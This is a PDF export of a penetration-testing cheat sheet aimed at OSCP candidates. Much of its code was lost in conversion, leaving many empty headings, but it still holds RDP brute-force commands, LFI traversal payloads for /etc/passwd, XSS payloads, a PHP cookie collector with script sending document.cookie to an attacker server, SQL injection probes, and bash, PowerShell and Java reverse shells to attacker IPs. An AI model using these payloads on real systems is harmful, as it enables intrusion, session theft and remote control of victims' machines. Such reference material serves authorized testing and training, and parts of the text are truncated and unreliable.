Pentest Cheat Sheets
Pentest Cheat Sheets
2023 07:30
Pentest-Cheat-Sheets
This repo has a collection of snippets of codes and commands to help our lives! The main
purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps
who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.
Ninja Tricks
Recon
DNS
SPF
Nmap
NetCat
SNMP
Mysql
MS SQL
Web Enumeration
Exploitation
System Network
RDP
Pass The Hash
https://md2pdf.netlify.app/ Page 1 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Windows-Shell
Web Application
Web Remote Code Execution
LFI
encode
XSS
SQLi
sqlmap
Bare Hands
Jekins
Post-exploitation
Reverse Shell
PHP Reverse Shell
Perl Reverse Shell
python Reverse Shell
Ruby Reverse Shell
bash Reverse Shell
powershell Reverse Sheel
Java Reverse Sheel
Xterm Reverse Sheel
Linux
Linux Privilege Escalation
Data Haversting and Enumeration
Linux Pivot
Sshutle
VPNPivot
SSH Tunneling
Linux Backdoring
Windows
Windows Enumeration
Windows Privilege Escalation
Hashdump
Transferring Files Without Metasploit
https://md2pdf.netlify.app/ Page 2 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Backdoring
Windows Pivot
Openssh for Tunneling
Plink
Resources
HTTP/HTTPS Servers
Wordlist
seclist
cotse
PacketStorm
Default Passwords
Default Passoword
Router Password
Leak
Pastebin
Tables
Contribution
Recon
DNS
Nslookup
Resolve a given hostname to the corresponding IP.
nslookup targetorganization.com
Zone Transfer
nslookup
server domain.com
ls -d domain.com
host -t ns domain.com
Auto tools
DNSenum
dnsenum targetdomain.com
https://md2pdf.netlify.app/ Page 4 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
DNSmap
targetdomain.com
dnsmap targetdomain.com -r
Fierce.pl
HostMap
SPF Recon
Dmarc
https://md2pdf.netlify.app/ Page 5 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Online Tools
https://dnsdumpster.com/
https://network-tools.com/nslook/
https://www.dnsqueries.com/en/
https://mxtoolbox.com/
Nmap
Stealth Scan
https://md2pdf.netlify.app/ Page 6 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Agressive scan
Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports
Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and
scripts against services
OS FigerPrint
nmap -O $ip
Quick Scan
output to a file
https://md2pdf.netlify.app/ Page 7 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Nmap Discovery
NetCat
Port Scanner
One port
nc -nvz 192.168.1.23 80
Port Range
Send files
Server
Client
Client
https://md2pdf.netlify.app/ Page 8 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Client
Banner Grabbing
Request
nc target port
HTTP_Verb path http/version
Host: url
Response
nc www.bla.com.br 80
HEAD / HTTP/1.0
Host: www.bla.com.br
SNMP
https://md2pdf.netlify.app/ Page 9 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
OneSixtyone
onesixtyone -c COMMUNITY_FILE -i Target_ip
snmpwalk
Walking MIB's
specific MIB node snmpwalk -c community -v version Target IP MIB Node Example: USER
ACCOUNTS = 1.3.6.1.4.1.77.1.2.25
snmp-check
snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY
snmp-check -t 172.20.10.5
https://md2pdf.netlify.app/ Page 10 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
Default Credentials
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
MYSQL
MSSQL
Web Enumeration
https://md2pdf.netlify.app/ Page 11 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Dirsearch
dirsearch -u https://target.com -e .
dirb
Gobuster
Exploitation
System Network
RDP
xfreerdp
https://md2pdf.netlify.app/ Page 12 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
login
xfreerdp /u: /g: /p: /v:<target_ip>
NCRACK
ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist>
<target_ip>:3389
Crowbar
crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s
<target_ip>/32 -v
Tool:
pth-toolkit
https://md2pdf.netlify.app/ Page 13 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Web Application
http://<target>/index.php?parameter=value
How to Test
http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=inde
http://<target>/script.php?page=../../../../../../../../etc/passwd
http://<target>/script.php?page=../../../../../../../../boot.ini
LFI Payloads
encode
https://md2pdf.netlify.app/ Page 14 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
XSS
Reflected
Simple test
This is a simple test to see what happens, this is not a prove that the field is vuln to xss
<plaintext>
<script>alert('Found')</script>
"><script>alert(Found)</script>">
<script>alert(String.fromCharCode(88,83,83))</script>
" onload="alert(String.fromCharCode(88,83,83))
" onload="alert('XSS')
Persistent
>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibili
PHP collector
https://md2pdf.netlify.app/ Page 15 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
<?php
$cookie=GET['cookie'];
$useragent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('cookie.txt', 'a');
fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n");
fclose($file);
?>
<scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;
<input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2
XSS payloads
SQLI
Sql Injection
Sqlmap
https://md2pdf.netlify.app/ Page 16 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
GET
Error-Based
Simple test
Example:
http://192.168.1.104/Less-1/?id=5'
List databases
List tables
List columns
Dump all
Set Cookie
Checking Privileges
https://md2pdf.netlify.app/ Page 17 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Reading file
Writing file
POST
You can also use a file like with the post request:
Bare Hands
GET
Error-Based
Simple test
https://md2pdf.netlify.app/ Page 18 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Example:
http://192.168.1.104/Less-1/?id=5'
Fuzzing
http://192.168.1.104/Less-1/?id=-1 order by 1
http://192.168.1.104/Less-1/?id=-1 order by 2
http://192.168.1.104/Less-1/?id=-1 order by 3
mysql
(using the same amount of columns you got on the previous step)
postgresql
(using the same amount of columns you got on the previous step)
Finding version
mysql
postgres
https://md2pdf.netlify.app/ Page 19 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
mysql
postgres
mysql
Finding databases
mysql
postgres
mysql
postgres
https://md2pdf.netlify.app/ Page 20 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
mysql
postgres
Concatenate
Example:
in one query
Current user
DBMS version
Database name
http://192.168.1.104/Less-1/?id=-1 or db_name(0)=0 --
https://md2pdf.netlify.app/ Page 21 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
remember to change dbname and tablename accordingly with the given situation after
each iteration a new column name will be found, make sure add it to ** previously found
column name ** separated by comma as on the next sample
Actual data
after each iteration a new column name will be found, make sure add it to ** previously
found column name ** separated by comma as on the next sample
Shell commands
https://md2pdf.netlify.app/ Page 22 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Jenkins
Post Exploitation
Reverse Shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.36.167/1337 0>&1'");
https://md2pdf.netlify.app/ Page 23 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
function reverse_powershell {
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream =
}
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read li
p.waitFor()
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to
do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
https://md2pdf.netlify.app/ Page 24 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
xhost +targetip
Linux
Windows
Powershell
python -m http.server
python -m SimpleHTTPServer 80
FTP
https://md2pdf.netlify.app/ Page 25 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Windows Client
ftp
open target_ip port
open 192.168.1.22 21
we can simply run ftp -s:ftp_commands.txt and we can download a file with no user interaction.
like this:
Apache Server
cp nc.exe /var/www/html
systemctl start apache2
client
Windows Pivoting
https://md2pdf.netlify.app/ Page 26 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Now if you need, just adjust the firewall rules to your needs:
Resources
HTTP/HTTPS Servers
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
https://md2pdf.netlify.app/ Page 27 of 28
Pentest-Cheat-Sheets 20.02.2023 07:30
Wordlists
Wordlists
PacketStorm
SecList
cotse
Default Password
DefaultPassword
RouterPassword
Leak
Pastebin
Tables
RainbowCrack
Contribution
HOW TO
https://md2pdf.netlify.app/ Page 28 of 28